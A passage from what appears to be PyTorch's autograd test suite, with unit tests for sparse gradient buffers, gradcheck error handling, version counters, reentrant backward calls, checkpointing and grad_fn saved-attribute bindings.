torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3])) NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr() return ngrad, ngrad a = torch.randn(10, 3, requires_grad=True) b = torch.randn(10, 3, requires_grad=True) input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.tensor([0, 4]) import torch.nn.functional as F # test case that should trigger no copy for one of a,b emb_matrix = MyFunc.apply(a, b) loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum() loss.backward(retain_graph=True) p_g = MyFunc.static_grad_ptr p_a = a.grad._values().data_ptr() p_b = b.grad._values().data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # check one of them is using the computed buffer self.assertTrue(p_a == p_g or p_b == p_g) # Run backwards multiple times to ensure accumulation works. for i in range(10): loss.backward(retain_graph=True) # non-contiguous indices and value, we should trigger a copy. a.grad = b.grad = None emb_matrix = NonContGradFunc.apply(a, b) loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum() loss.backward(retain_graph=True) p_g = NonContGradFunc.static_grad_ptr p_a = a.grad._values().data_ptr() p_b = b.grad._values().data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # Verify we cloned both grads. self.assertFalse(p_a == p_g) self.assertFalse(p_b == p_g) # Run backwards multiple times to ensure accumulation works. 
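# A minimal standalone example of the "accumulation" the comment above refers to:
# every backward() call adds into the leaves' .grad instead of overwriting it, which
# is exactly what the repeated loss.backward(retain_graph=True) calls below exercise.
# Names here are illustrative only.
import torch

w = torch.ones(3, requires_grad=True)
loss = (2 * w).sum()
loss.backward(retain_graph=True)
loss.backward(retain_graph=True)
assert torch.equal(w.grad, torch.full((3,), 4.0))  # 2 + 2 accumulated over two calls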
for i in range(10): loss.backward(retain_graph=True) def test_gradcheck_single_input(self): def check(fast_mode): def f(inp): return inp.mul(5) gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode) gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_sparse_input(self): def check(fast_mode): def fn(sparse): return torch.sparse.sum(sparse) gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'): gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_nondeterministic(self): class NonDetFunc(Function): @staticmethod def forward(ctx, x, jitter=0.0): ctx._jitter = jitter return x @staticmethod def backward(ctx, grad_out): return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None def check(fast_mode): inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'): gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'): gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode) gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_validates_inputs(self): def check(fast_mode): # when inputs are not dense, but check_sparse_nnz is false x = torch.rand(10, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'): gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when none of the inputs require grad (always raises even if raise_exception=False) x = torch.rand(10, requires_grad=False) with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'): gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode) # (warning) when inputs are not double precision x = torch.ones(1, dtype=torch.float32, requires_grad=True) with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"): self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode)) # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. 
(always raises # even if raise_exception=False) x = torch.ones(1, dtype=torch.float64, requires_grad=True) x = x.expand((2, 2)) with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'): gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) @unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled") def test_gradcheck_test_outputs(self): def check(fast_mode): # when sparse outputs (always raise even if raise_exception=False) x = torch.rand(10, requires_grad=True).to_sparse() with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'): gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode) # when mkldnn outputs (always raise even if raise_exception=False) root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True) with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'): gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_check_no_differentiable_outputs(self): def check(fast_mode): # When none of the outputs are differentiable, but numerical gradient is not zero x = torch.ones((1,), requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'): gradcheck(lambda x: torch.tensor([x]), x) self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode)) # succeed when no outputs at all self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_check_batched_grad(self): def check(fast_mode): x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse() # runtime error while compute batched grad (print big error) with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'): gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode) self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_backward_mul_by_grad_output(self): # when grad_input is sparse and has incorrect sparse_dim/dense_dim def check(fast_mode): def fn(x): def hook(grad): if grad is not None: return grad.to_dense().to_sparse(1) return grad y = x.clone() y.register_hook(hook) return y.to_dense() x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'): gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when backward not multiplied by grad_output (non-sparse case) def fn2(x): y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'): gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode) self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode)) # when backward not 
multiplied by grad_output (sparse case) def fn3(x): y = x.clone().to_dense() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse() with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'): gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) # when layout of grad_input is not the same as input class Test(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): return x.to_sparse() x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'): gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode) self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_undefined_grad(self): def check(fast_mode): # when encounter runtime error while running backward def fn(x): def hook(x): if x is None: raise RuntimeError("x is undefined") y = x.clone() y.register_hook(hook) return y x = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"): with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_jacobian_mismatch(self): def check(fast_mode): def fn(x): # R -> R, C -> C y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128) with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'): gradcheck(fn, (x_c,), fast_mode=False) self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False)) def fn2(x): # R -> C y = torch.complex(x, x) y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'): gradcheck(fn2, (x,), fast_mode=False) self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False)) def fn3(x): # C -> R y = torch.real(x) y.register_hook(lambda x: x + 1e-2) return y with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn3, (x_c,), fast_mode=False) self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_dense_and_sparse_inputs(self): def check(fast_mode): def fn(x, y): return x * y.coalesce().to_dense() a = torch.rand(2, 2, dtype=torch.double, requires_grad=True) b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)) check(fast_mode=True) 
check(fast_mode=False) @unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled") def test_gradcheck_multiple_mkldnn_inputs(self): def check(fast_mode): def fn(x, y): return x + y.to_dense() a = torch.rand(10, requires_grad=True) b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode)) def fn2(x, y): return x.to_dense() + y.to_dense() c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True) self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_output_shape_or_dtype_depend_on_values(self): def check(fast_mode): def fn(x): if torch.all(x >= 1): return torch.cat([x, x]) else: return x a = torch.ones(1, dtype=torch.double, requires_grad=True) with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'): self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode)) def fn2(x): if torch.all(x >= 1): return x.to(torch.float32) else: return x with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'): self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode)) check(fast_mode=True) check(fast_mode=False) def test_gradcheck_complex_non_complex_outputs(self): def fn(x, y): z = torch.complex(x, y) return z, x + 1 a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64) b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64) self.assertTrue(gradcheck(fn, (a, b))) def fn2(z): return z, torch.real(z) c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128) self.assertTrue(gradcheck(fn2, (c))) def test_gradcheck_get_numerical_jacobian(self): # get_numerical_jacobian is deprecated and no longer used internally by gradcheck from torch.autograd.gradcheck import get_numerical_jacobian def fn(inputs): # get_numerical_jacobian requires fn to take inputs as a tuple # and returns the jacobian wrt the first output x = inputs[0] y = inputs[1] return 2 * x + y, x + 2 * y a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"): jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6) self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double)) with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"): jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6) self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double)) self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double)) with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"): jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0) def test_gradcheck_get_analytical_jacobian(self): from torch.autograd.gradcheck import get_analytical_jacobian def fn(x, y): return 2 * x + y, x + 2 * y a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64) outputs = fn(a, b) with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"): jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0]) self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double)) self.assertEqual(jacobians[1], 1 * torch.eye(4, 
dtype=torch.double)) self.assertTrue(reentrant) class NonDetFunc(Function): @staticmethod def forward(ctx, x, jitter=0.0): ctx._jitter = jitter return x @staticmethod def backward(ctx, grad_out): return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None outputs = NonDetFunc.apply(a, 1e-6) with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"): jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs) self.assertFalse(reentrant) with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"): jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0) def test_gradcheck_custom_error(self): from torch.autograd.gradcheck import GradcheckError def check(fast_mode): def fn(x): y = x.clone() y.register_hook(lambda x: x + 1e-2) return y x = torch.ones(2, 2, requires_grad=True) with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'): gradcheck(fn, (x,), fast_mode=fast_mode) self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode)) def fn2(x): raise RuntimeError("Not a GradcheckError!") # Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"): gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False) check(fast_mode=True) check(fast_mode=False) def test_version_counter(self): x = torch.randn(1, 2) # In-place op bumps version x_saved_version = x._version x.add_(1).add_(1) self.assertTrue(x._version > x_saved_version) # Differentiable view shares version counter xz = x[:] self.assertTrue(x._version == xz._version) xz.add_(1) self.assertTrue(x._version == xz._version) # `x.data = y` preserves version counter of `x` x_saved_version = x._version x.data = torch.randn(2, 3) self.assertTrue(x._version == x_saved_version) x.add_(1) self.assertTrue(x._version > x_saved_version) # Make sure `x` is still using the same version counter it shares with `xz` self.assertTrue(x._version == xz._version) # In-place op on `xz` also updates version of `x`, # because they share the version counter xz.add_(1) self.assertTrue(x._version == xz._version) def test_set_data_tensorimpl_type(self): # Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl # of type `SparseTensorImpl`. 
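# A standalone recap of the version-counter behaviour exercised in
# test_version_counter above: in-place ops bump the hidden _version counter, and a
# view shares that counter with its base. This sketch uses only the same private
# attribute (_version) that the test itself relies on.
import torch

base = torch.randn(3)
view = base[:2]                 # a view shares its base's version counter
v0 = base._version
base.add_(1)
assert base._version == view._version == v0 + 1
view.mul_(2)                    # in-place on the view bumps the shared counter too
assert base._version == view._version == v0 + 2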
x = torch.randn(1, 2) x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1])) with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'): x.data = x_s def test_set_data_preserve_pyobj(self): a = torch.randn(1, 2) b = torch.randn(1, 2) b_id_saved = id(b) b.data = a self.assertTrue(b_id_saved == id(b)) @unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows") def test_thread_shutdown(self): code = """import torch from torch.autograd import Function class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): return grad for shape in [(1,), ()]: v = torch.ones(shape, requires_grad=True) MyFunction.apply(v).backward() """ s = TestCase.runWithPytorchAPIUsageStderr(code) self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown") @unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941") def test_deep_reentrant(self): class DeepReentrant(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x.detach(), requires_grad=True) ctx.x = ctx.x - 1 return ctx.x.detach() @staticmethod def backward(ctx, x): if ctx.x < 0: return x with torch.enable_grad(): DeepReentrant.apply(ctx.x).sum().backward() return x # Test stack overflow escape mechanism v = torch.tensor(2000.0, requires_grad=True) # This will cause stack overflow if reentrant calls are handled # in the same thread recursively DeepReentrant.apply(v).sum().backward() # Test stack overflow escape mechanism multiple times # to ensure reusing workers in the pool works fine v2 = torch.tensor(200.0, requires_grad=True) DeepReentrant.apply(v2).sum().backward() def test_reentrant_priority(self): order = [] class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): order.append("MyFunction") return x class Reentrant(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x.detach(), requires_grad=True) ctx.x = ctx.x - 1 return ctx.x.detach() @staticmethod def backward(ctx, x): order.append("Reentrant") if ctx.x < 0: return x with torch.enable_grad(): Reentrant.apply(ctx.x).backward() return x a = MyFunction.apply(torch.tensor(6.0, requires_grad=True)) b = Reentrant.apply(torch.tensor(9.0, requires_grad=True)) v = a * b v.backward() # The tasks for the Reentrant and MyFunction backward() will be added # to the queue in the autograd engine at the same time. The backward # for Reentrant will be executed first, which will then add other # backward tasks to the queue. 
We want to ensure all the reentrant tasks # are prioritized over the MyFunction backward task regardless of their # sequence numbers self.assertEqual(len(order), 11) self.assertEqual(order.count("Reentrant"), 10) self.assertEqual(order[-1], "MyFunction") @slowTest def test_checkpointing(self): num_inp = 2000 nz_inp = 10 nz_out = 10 nz_bottleneck = 1000 # small proxy network for some complex reasoning we want to do per input module = nn.Sequential( nn.Linear(nz_inp, nz_bottleneck), nn.ReLU(), nn.Linear(nz_bottleneck, nz_inp) ) feat_combined = [] for r in range(num_inp): data_r = torch.empty(1, nz_inp) data_r.uniform_() data_r.requires_grad = True feat_r = checkpoint(module, data_r) feat_combined.append(feat_r) # compute mean as a proxy for some joint reasoning mean_combined = torch.stack(feat_combined).mean() mean_combined.backward() def test_checkpoint_valid_reset_on_error(self): a = torch.randn(2, 2, requires_grad=True) with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"): b = checkpoint(torch.exp, a).sum() torch.autograd.grad(b, (a,)) c = checkpoint(torch.exp, a).sum() c.backward() def _test_reentrant_with_callbacks(self, install_callbacks_in_depths): counter = {} counter["inner"] = 0 counter["outer"] = 0 def inc_inner_counter(): counter["inner"] += 1 def inc_outer_counter(): counter["outer"] += 1 class MyFunc(Function): @staticmethod def forward(ctx, input): return input @staticmethod @once_differentiable def backward(ctx, input): if 1 in install_callbacks_in_depths: # Add a callback to execute. Variable._execution_engine.queue_callback(inc_inner_counter) return input class MyReentrantFunc(Function): @staticmethod def forward(ctx, input): return input @staticmethod @once_differentiable def backward(ctx, input): if 0 in install_callbacks_in_depths: # Add a callback to execute. Variable._execution_engine.queue_callback(inc_outer_counter) # Reentrant backward call. tmp_inp = input.detach().requires_grad_() with torch.enable_grad(): tmp_out = (MyFunc.apply(tmp_inp)).sum() tmp_out.backward() return input t1 = torch.rand((3, 3), requires_grad=True) t2 = MyReentrantFunc.apply(t1) t3 = t2.sum() torch.autograd.backward([t3]) return counter def test_reentrant_with_callbacks_depth_0(self): # Verify callback is called only once. ret = self._test_reentrant_with_callbacks([0]) self.assertEqual(1, ret["outer"]) self.assertEqual(0, ret["inner"]) def test_reentrant_with_callbacks_depth_1(self): # Verify callback is called only once. ret = self._test_reentrant_with_callbacks([1]) self.assertEqual(0, ret["outer"]) self.assertEqual(1, ret["inner"]) def test_reentrant_with_callbacks_both_depths(self): # Verify callback is called twice. 
ret = self._test_reentrant_with_callbacks([0, 1]) self.assertEqual(1, ret["outer"]) self.assertEqual(1, ret["inner"]) def test_reentrant_with_leaf_variable_hook(self): handle = None param = torch.rand(10, requires_grad=True) def add_gradient_penalty_to_grad(grad): handle.remove() old_param_grad = grad param.grad = None # Add some sort of gradient penalty by directly updating the gradients with torch.enable_grad(): g = grad.detach().requires_grad_() new_param = param.detach().requires_grad_() out = ((g * 2) + new_param).sum() out.backward() res = g.grad + grad param.grad = old_param_grad return res handle = param.register_hook(add_gradient_penalty_to_grad) # Forward pass tmp = (param * param) loss = tmp.sum() # Compute the gradients loss.backward() def test_reentrant_with_non_leaf_variable_hook(self): handle = None param = torch.rand(10, requires_grad=True) def manual_increase_gradient(grad): handle.remove() # Add some sort of gradient penalty by directly updating the gradients with torch.enable_grad(): g = grad.detach().requires_grad_() out = ((g * 2) + 5).sum() out.backward() res = g.grad + grad return res # Forward pass tmp = (param * param) handle = tmp.register_hook(manual_increase_gradient) loss = tmp.sum() # Compute the gradients loss.backward() self.assertEqual(param.grad, 6 * param) def test_grad_fn_attr_bindings(self): # Check that the getter of each type returns what we want # See `gen_autograd_functions.py` for how the getters are generated # # This test is only meant to check if the codegen'd bindings work # Please help update this test if you update the names of any the fields we check! # a = torch.ones(1, requires_grad=True) b = torch.ones(1, requires_grad=True) out = torch.stack([a, b], dim=0) self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor] self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor) self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int self.assertIsInstance(out.grad_fn._saved_dim, int) out.sum().backward() with self.assertRaisesRegex(RuntimeError, "after they have already been freed"): out.grad_fn._saved_tensors self.assertEqual(out.grad_fn._saved_dim, 0) a = torch.ones(2, 2, requires_grad=True) indices = torch.tensor([0, 1]) out = a[:, indices] self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?] self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor) self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int] self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int) a = torch.ones(1, 1, 2, requires_grad=True) out = torch.nn.functional.interpolate(a, 4, mode="linear") self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]? self.assertIsInstance(out.grad_fn._saved_output_size[0], int) self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool self.assertIsInstance(out.grad_fn._saved_align_corners, bool) self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]? out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear") self.assertIsNone(out.grad_fn._saved_output_size) self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,)) self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float) a = torch.ones(2, 2, requires_grad=True) out = torch.pdist(a, p=1) self.assertEqual(out.grad_fn._saved_p, 1.) 
# double -> float self.assertIsInstance(out.grad_fn._saved_p, float) a = torch.ones(1, 1, 2, requires_grad=True) out = torch.logit(a, 1.) self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float? self.assertIsInstance(out.grad_fn._saved_eps, float) out = torch.logit(a) self.assertIsNone(out.grad_fn._saved_eps) if torch._C.has_lapack: a = torch.ones(1, 1, requires_grad=True) q, r = torch.linalg.qr(a, mode="reduced") self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str a = torch.tensor([1.], requires_grad=True) out = torch.div(a, 2., rounding_mode="trunc") self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str? out = torch.div(a, 2., rounding_mode=None) self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str? x = torch.zeros(5, requires_grad=True) out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j)) self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex cfloat = torch.tensor(1 + 0j, dtype=torch.complex64) out = torch.threshold(x, threshold=cfloat, value=(1 + 0j)) self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex out = torch.threshold(x, threshold=1., value=1.) self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float out = torch.threshold(x, threshold=1, value=1) self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int out = torch.threshold(x, threshold=False, value=False) self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool a = torch.ones(2, 2, requires_grad=True) out = a.as_strided((3,), (1,), 1) self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int? self.assertIsInstance(out.grad_fn._saved_storage_offset, int) out = a.as_strided((3,), (1,)) self.assertIsNone(out.grad_fn._saved_storage_offset) a = torch.ones(2, requires_grad=True) out = torch.tanh(a) self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output a = torch.randn(3, 5, requires_grad=True) b = torch.tensor([1, 0, 4]) loss = nn.NLLLoss() out = loss(a, b) self.assertIsNone(out.grad_fn._saved_weight) loss = nn.NLLLoss(weight=torch.ones((5,))) out = loss(a, b) self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor? out.sum().backward() with self.assertRaisesRegex(RuntimeError, "after they have already been freed"): out.grad_fn._saved_weight def test_autograd_views_codegen(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This test checks the behavior of two codegen functions (view_as and unbind) # with respect to view tracking and inplace operation on the output. def run_test(grad_mode, requires_grad, is_view, should_raise_tuple): def maybe_check_raise(fn, should_raise): self.assertTrue(should_raise is None or isinstance(should_raise, str)) if should_raise is not None: with self.assertRaisesRegex(RuntimeError, should_raise): fn() else: fn() inp = torch.rand(2, requires_grad=requires_grad).clone() with torch.set_grad_enabled(grad_mode): out = inp.view_as(inp) # Are they differentiable views? self.assertTrue(out._is_view() == is_view) # Are inplace allowed? 
            maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])

            inp = torch.rand(2, requires_grad=requires_grad).clone()
            with torch.set_grad_enabled(grad_mode):
                out = inp.unbind()
            # Are they differentiable views?
            self.assertTrue(out[0]._is_view() == is_view)
            self.assertTrue(out[1]._is_view() == is_view)
            # Are inplace allowed?
            maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
            maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])

        # should_raise contains None if it should not raise
        # should_raise contains a string of the error if it should raise
        # The 3 elements are for view_as, first output of unbind and second output of unbind
        run_test(grad_mode=True, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))
        inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
        run_test(grad_mode=True, requires_grad=True, is_view=True,
                 should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
        leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
        run_test(grad_mode=False, requires_grad=True, is_view=True,
                 should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
        run_test(grad_mode=False, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))

    def test_inplace_not_requires_grad(self):
        class MyFn(torch.autograd.Function):
            @staticmethod
            def forward(ctx, inp):
                return inp.view_as(inp)

            @staticmethod
            def backward(ctx, grad):
                return grad

